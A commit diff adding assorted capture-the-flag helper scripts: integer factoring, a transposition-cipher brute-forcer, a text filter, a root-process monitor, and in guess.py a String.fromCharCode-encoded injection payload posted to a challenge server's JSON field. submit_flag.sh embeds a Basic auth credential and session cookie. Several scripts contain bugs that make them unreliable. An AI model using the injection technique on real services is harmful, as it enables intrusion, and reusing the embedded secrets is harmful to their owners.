Reorganise gists folder

codegrab/ctf/ctf

@@ -0,0 +1,7 @@
+import primefac
+import sys
+
+# n = int( sys.argv[1] )
+n=1547526036699919708490609738397251465827883560269494112135036895312456811185879551982265065963
+factors = list( primefac.primefac(n) )
+print '\n'.join(map(str, factors))

codegrab/ctf/filtertext.py

@@ -0,0 +1,13 @@
+import sys
+from nltk.corpus import stopwords
+from nltk.tokenize import word_tokenize
+
+
+with open(sys.argv[0],'r')  as  f:
+    text=" ".join(f.readlines())
+stop_words = set(stopwords.words('english'))
+word_tokens = word_tokenize(text)
+for word in [w for w in word_tokens if len(w)>3 and not w in stop_words]:
+    word=word.strip(' \n,.=!_\'')
+    word.replace(".","_")
+    print(word)

codegrab/ctf/getjs.py

@@ -0,0 +1,2 @@
+def getjss(text):
+    return "String.fromCharCode({})".format(",".join(["{}".format(ord(x)) for x in text]))

codegrab/ctf/guess.py

@@ -0,0 +1,22 @@
+import requests
+import sys
+from pprint import pprint
+
+def getjss(text):
+ return "String.fromCharCode({})".format(",".join(["{}".format(ord(x)) for x in text]))
+
+
+def test(teststring):
+  return '''test' + ''' + getjss('},'+teststring+',{"guess":"')  + ''' + 'test'''
+
+
+burp0_url = "http://cxvhbgkymde5cg.code.unibw-muenchen.de:80/a81b583202982d472bde5e9f4a89becd/guess"
+burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://cxvhbgkymde5cg.code.unibw-muenchen.de/a81b583202982d472bde5e9f4a89becd/", "Content-Type": "application/json;charset=utf-8", "Authorization": "Basic dX==", "Connection": "close"}
+
+s=test(sys.argv[1])
+burp0_json={"guess": s }
+print(s)
+r=requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
+pprint(r.text)
+for head in r.headers:
+ print("{}\t{}".format(head,r.headers[head]))

codegrab/ctf/ps_.py

@@ -0,0 +1,112 @@
+import psutil
+import os
+import pwd
+import sys
+from collections import defaultdict
+
+mypid=os.getpid()
+
+#Check if run as root
+white_list_pname = [ "systemd", "kthreadd", "apport-gtk"]
+white_list_pid =[]
+
+if (os.geteuid()) != 0:
+    print("[-] Not Root")
+else:
+    #whitelist this python script and all parents
+    cursor=psutil.Process()
+    ende=0
+    while cursor != None:
+        white_list_pid.append(cursor.pid)
+        cursor=cursor.parent()
+    print(white_list_pid)
+
+mydict = defaultdict(list)
+ps_dict = defaultdict(list)
+
+def on_terminate(proc):
+    print("[+] Terminating Child: %s" % (str(proc)))
+
+def killpid(pid):
+    parent = psutil.Process(pid)
+
+    print(len(parent.children()))
+    children=parent.children(recursive=True)
+    for child in children:
+        try:
+            child.terminate()
+        except Exception as e :
+            print("[-] FAILED - Terminating Child: %s" % (str(child)))
+            print("[-] ERROR: %s" % str(e))
+
+
+    gone, still_alive = psutil.wait_procs(children, timeout=3, callback=on_terminate)
+
+    for child in still_alive:
+        try:
+            child.kill()
+        except Exception as e :
+            print("[-] FAILED - Terminating Child: %s" % (str(child)))
+            print("[-] ERROR: %s" % str(e))
+        else:
+            print("[+] Terminating Child: %s" % (str(child)))
+    try:
+        parent.terminate()
+        parent.wait(timeout=3)
+        parent.kill()
+    except Exception as e:
+        print("[-] FAILED - Killing Process: %s" % (str(parent)))
+        print("[-] ERROR: %s" % str(e))
+    else:
+        print("[+] Process Killes: %s" % (str(parent)))
+
+
+
+def printproc(p: psutil.Process):
+    return "{0}({1})".format(p.name(),p.pid())
+
+
+def printchild(p: psutil.Process):
+    output=printproc(p) + "-"
+    for c in p.children():
+        output+=printproc(c)
+
+
+#Fill ps_dict with processes
+for proc in psutil.process_iter():
+    try:
+        pinfo = proc.as_dict(attrs=['pid','uids','ppid','name','create_time','terminal','username'])
+    except psutil.NoSuchProcess:
+        pass
+    else:
+        pid=str(pinfo['pid'])
+        ps_dict[pid]=pinfo
+
+
+#Walk ps_dict and fill in missing information
+for key in ps_dict:
+    p=ps_dict[key]
+    ppid=str(p['ppid'])
+    if ppid in ps_dict:
+        pp=ps_dict[ppid]
+        p['ppname'] = pp['name']
+        p['ppusername'] = pp['username']
+        p['ppuids'] = pp['uids']
+        p['ppcreate_time'] = pp['create_time']
+
+
+#Kill all escalators
+to_kill=[]
+
+for key in ps_dict:
+    p=ps_dict[key]
+    if 'ppusername' in p and 'real=0' in str(p['uids']) and p['username'] not in p['ppusername']:
+        if p['name'] not in white_list_pname:
+            print("[+] Escalted Process found: %s (%s)" % (str(p['name']),str(p['pid'])))
+            printchild(psutil.Process(p['pid']))
+
+
+
+for pid in to_kill:
+    if pid not in white_list_pid:
+        killpid(pid)

codegrab/ctf/search.py

@@ -0,0 +1,17 @@
+import math
+x=1
+notfound=1
+while notfound:
+	silber=math.pow(x,2)
+	ungerade=math.floor(silber/16.)%2
+	rest=silber%16
+#	print str(silber) + " " + str(ungerade)
+	if ungerade == 1 and rest>1 and rest<9:
+		print "rest passt"
+		print x
+		print silber
+		print rest
+		print 16-rest
+		notfound=0
+	x+=1
+

codegrab/ctf/submit_flag.sh

@@ -0,0 +1,3 @@
+#!/bin/bash
+curl 'https://score.code.unibw-muenchen.de/quali/flag' -H 'Authorization: Basic Y3RmMjAxOXF1YWxpOmN0ZjIwMTl0aDM1dGhlbGVtM250' -H 'Sec-Fetch-Site: same-origin' -H 'Origin: https://score.code.unibw-muenchen.de' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-DE,en;q=0.9,de-DE;q=0.8,de;q=0.7,en-US;q=0.6' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36' -H 'Sec-Fetch-Mode: cors' -H 'Content-Type: application/json;charset=UTF-8' -H 'Accept: application/json, text/plain, */*' -H 'Referer: https://score.code.unibw-muenchen.de/quali/' -H 'Cookie: connect.sid=s%3AYfJKqsKR9tYJTPFRUfgTGr3-r306-LL2.yo4tGwhIG%2FaqwiHCmEJgj%2Blr1m7wTd1OKN0BHGLEHt4; io=uqljJkFKOYy_3X_QAAlQ' -H 'Connection: keep-alive' -H 'DNT: 1' --data-binary '{"flag":"$1"}' --compressed
+sleep 6

codegrab/ctf/transpose.py

@@ -0,0 +1,125 @@
+#!/usr/bin/env python3
+import pprint
+import math
+import itertools
+try:
+    import tqdm
+    has_tqdm=True
+except ImportError:
+    print("Install tqdm for Progressbar! (pip3 install tqdm)")
+    has_tqdm=False
+
+
+secret="OUHRSTHFSOENOFETURFELIRFTSNEMOEEMELNTARETOKCAETBFIHFTTTNMEELEEOHYBAERORCRSEDNCEUUTHITOYRSTEDSBEIEOTNLRMOEFPOHHAYLAGXYISNIARAUABGBURILFERPEEHTECDINNDITHFFIEHTKESYTDHEREOALGNABSMWEHVEFSOAMETAOCRFTAHEOFSINAMEOTRNGRINTHFFIEHTIEGMELNTSTEOMCOHEOWTEWREAIDANHTRARARTEHEETVFIYREAHVSAONDPROSTRAEUOYCTTTHWISANMUHETENTIISEDHETSUSENTEITNG   OOLEEB L"
+col_key="EJALMVWUSTRPOBY" # (16)missing 1 char
+row_key="GHPTYPAMTAPQRNDHD" # (21) missing 4 chars one of which is 'D'
+col_alpha="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+row_alpha="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+
+def cell_length(text_length,key_length):
+    return math.ceil(text_length/key_length)
+
+def padded_length(text_length,key_length):
+    return cell_length(text_length,key_length)*key_length
+
+def revert_key(enc_key):
+    return [x[0] for x in sorted(enumerate(enc_key), key=lambda x: x[1])]
+
+def mosh(text,enc_key):
+    tmp=sorted(zip(text,enc_key), key=lambda x: x[1])
+    return [x[0] for x in tmp]
+
+def cols(text,key_length):
+    # col_length=cell_length(len(text),key_length)
+    columns=[ "" for i in range(0,key_length) ]
+    cursor=0
+    for c in text:
+        columns[cursor%key_length]+=c
+        cursor += 1
+    return columns
+
+def rows(text,key_length):
+    # row_length=math.ceil(len(text)/key_length)
+    rows=[text[i:i+key_length] for i in range(0,len(text),key_length)]
+    return rows
+
+def cols_to_str(a):
+    max_length=max([len(i) for i in a] )
+    result=""
+    for i in range(0,max_length):
+        for x in a:
+            try:
+                result+=x[i]
+            except:
+                pass
+    return result
+
+def rows_to_str(a):
+    return "".join(a)
+
+def pcols(a):
+    print("COLUMS:")
+    text=cols_to_str(a)
+    split_text=rows(text,len(a))
+    for x in split_text:
+        print(x)
+
+def prows(a,header=None):
+    print("ROWS:")
+    counter=0
+    for x in a:
+        if header:
+            heading="{}".format(header[counter]).ljust(5)
+        else:
+            heading="{}".format(counter).ljust(5)
+        counter+=1
+        print("%s : %s"%(heading,x))
+
+def encode(text,key):
+    text=text.ljust(padded_length(len(text),len(key)),'_')
+    columnized_text=cols(text,len(key))
+    shuffled_colums=mosh(columnized_text,key)
+    return rows_to_str(shuffled_colums)
+
+def decode(text,key):
+    row_data=rows(text,cell_length(len(text), len(key)))
+    reorderd=mosh(row_data,revert_key(key))
+    return cols_to_str(reorderd)
+
+def get_col_keys():
+    for x in col_alpha:
+        yield col_key+x
+
+def get_row_keys():
+    for x in row_alpha:
+        for y in row_alpha:
+            for z in row_alpha:
+                # for d in row_alpha:
+                #     yield(row_key+d+x+y+z)
+                yield(row_key+"D"+x+y+z)
+                yield(row_key+x+"D"+y+z)
+                yield(row_key+x+y+"D"+z)
+                yield(row_key+x+y+z+"D")
+
+def normalize_keys(key_generator):
+    k = [revert_key(revert_key(x)) for x in key_generator]
+    k.sort()
+    return list(k for k,_ in itertools.groupby(k))
+
+def decryptor():
+    rowkeys=normalize_keys(get_row_keys())
+    colkeys=normalize_keys(get_col_keys())
+    if has_tqdm:
+        pbar=tqdm.tqdm(total=(len(rowkeys)*len(colkeys)))
+
+    with open("normalized2.txt",'w') as f:
+        for col_key in colkeys:
+            for row_key in rowkeys:
+                text=encode(encode(secret,col_key),row_key)
+                f.write("{};{};{}\n".format(row_key,col_key,text))
+                if has_tqdm:
+                    pbar.update(1)
+    if has_tqdm:
+        pbar.close()
+
+decryptor()